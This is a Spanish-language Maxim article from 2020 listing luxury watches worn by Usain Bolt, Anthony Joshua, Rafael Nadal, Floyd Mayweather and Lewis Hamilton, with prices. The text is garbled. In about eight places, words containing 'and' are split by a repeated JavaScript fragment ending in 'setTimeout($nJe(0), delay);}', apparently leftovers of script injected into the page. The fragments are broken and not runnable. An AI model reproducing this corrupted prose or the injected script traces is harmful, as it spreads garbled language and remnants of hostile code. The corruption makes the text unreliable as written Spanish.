Relojes que utilizan los jugadores mejor pagados del mundo

    Relojes que utilizan los jugadores mejor pagados del mundo

    Son los mejores deportistas y llevan los relojes más caros del mundo.

    Autor: Redacción Maxim 11 marzo, 2020


    FOTO: Instagram @rafaelnadal

     

    Los relojes y los deportistas han sido una mancuerna durante décadas.

     

    A pesar de que la mayor parte de los deportistas actuales llevan relojes modernos, el mercado para los relojes vintage ha crecido los últimos años. No es nada nuevo que las marcas de relojes compitan por el patrocinio de los mejores deportistas del mundo, desde Floyd Mayweather hasta la mitad de los tenistas en activo, como Roger Federer o Rafa Nadal.

     

    Aquí te mostramos los 5 relojes más caros que lucen los mejores deportistas del mundo.

     

    Usain Bolt

    Hublot Big Bang UNICO (35.670 Euros)

    El hombre más rápido del mundo, tiene su propia línea de relojes Hublot hechos en oro y cristal, producidos por la marca desde principios de la temporada 2016 de atletismo para conmemorar su carrera y su retirada de las pistas. Esta línea incluye la silueta de Bolt grabada realizandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando su conocida celebración de la victoria.

     

     

     

    Anthony Joshua

    Audemars Piguet Royal Oak Off-Shore (399.060 Euros)

    Anthony Joshua es uno de los principales nombres del deporte británico y mundial. Ha ganado mucho dinero boxeandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando, pero también gracias a sus aventuras empresariales. El año pasado acumuló unos 3,5 millones de dólares de patrocinadores.

     

    https://twitter.com/anthonyfjoshua/status/860601178970836992/photo/1

     

     

    Además de los ingresos monetarios, recibe algunos regalos de sus socios comerciales, incluida la casa relojera Audemars Piguet, como este reloj de casi 400,000 euros. 

     

     

    Rafael Nadal

    Richard Mille RM27-02 (679.000 Euros)

    Rafael Nadal es uno de los embajadores más importantes de la marca Richard Mille, y uno de los pocos deportistas de este listado que lleva sus relojes cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando compite. Este modelo fue diseñado especialmente para él, con una tecnología de punta que amortigua las vibraciones. También se han incluido algunos detalles naranjas para reflejar el color de las pistas de Rolandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Garros, donde Nadal ha dominado durante tantos años.

     

     

     

    Floyd Mayweather

    Hublot (1.189.000 Euros)

    «Money» Mayweather es famoso por ser uno de los deportistas mejor pagados, así que su acuerdo con Hublot tiene mucho sentido. Aunque se rumora que tiene una colección de relojes que va mucho más allá de los modelos de Hublot, es muy probable que veas en su muñeca el modelo de esta marca llamado Big Bang con diamantes incrustados y con un precio de casi 1,2 millones de euros.

     

     

     

     

    Lewis Hamilton

    IWC Big Pilot Special Edition, precio desconocido

     

    Lewis Hamilton y todo el equipo de Mercedes F1 son patrocinados por IWC, por lo tanto, Hamilton tiene que llevar bastantes de los modelos de esta marca, sobre todo ediciones limitadas. El que lleva en la foto es el IWC Big Pilot Perpetual Calendar hecho en oro y cuyo precio no está disponible para el público.

     

     

     

    Hablandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes deportistas, estos son LOS 7 JUGADORES MÁS CAROS DE LA LIGA FRANCESA

     

     

    Temas relacionados con esta nota: , , , ,

Son los mejores deportistas y llevan los relojes más caros del mundo.